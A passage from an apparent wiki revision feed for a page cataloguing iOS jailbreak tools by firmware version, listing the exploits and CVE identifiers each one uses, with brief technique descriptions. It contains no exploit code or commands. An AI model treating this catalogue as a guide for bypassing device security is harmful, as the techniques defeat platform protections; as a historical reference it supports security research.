&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.5.3)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.5.3)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
12.4.1&lt;br /&gt;
&lt;br /&gt;
* AppleAVE2Driver exploit ({{cve|2019-8795}})&lt;br /&gt;
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})&lt;br /&gt;
&lt;br /&gt;
12.4.2 - 12.5.3&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.5.3)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.3 (before version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* tachy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[Odyssey]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5&lt;br /&gt;
&lt;br /&gt;
* tardy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)&lt;br /&gt;
&lt;br /&gt;
* FreeTheSandbox_LPE_POC_13.7&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with A8/A9 SoCs)&lt;br /&gt;
&lt;br /&gt;
* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 14.x ==&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (14.0 - 14.6 beta)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
===[[unc0ver]] (14.0 - 14.3)===&lt;br /&gt;
&lt;br /&gt;
* ivac entry use-after-free ({{cve|2021-1782}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=113497</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=113497"/>
		<updated>2021-05-13T01:17:55Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* checkra1n (14.0 - 14.6 beta) */ Updated title of section to include recent iOS versions&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]]&lt;br /&gt;
* [[Timezone Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
12.4.1&lt;br /&gt;
&lt;br /&gt;
* AppleAVE2Driver exploit ({{cve|2019-8795}})&lt;br /&gt;
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})&lt;br /&gt;
&lt;br /&gt;
12.4.2 - 12.4.8&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.3 (before version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* tachy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[Odyssey]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5&lt;br /&gt;
&lt;br /&gt;
* tardy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)&lt;br /&gt;
&lt;br /&gt;
* FreeTheSandbox_LPE_POC_13.7&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with A8/A9 SoCs)&lt;br /&gt;
&lt;br /&gt;
* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 14.x ==&lt;br /&gt;
&lt;br /&gt;
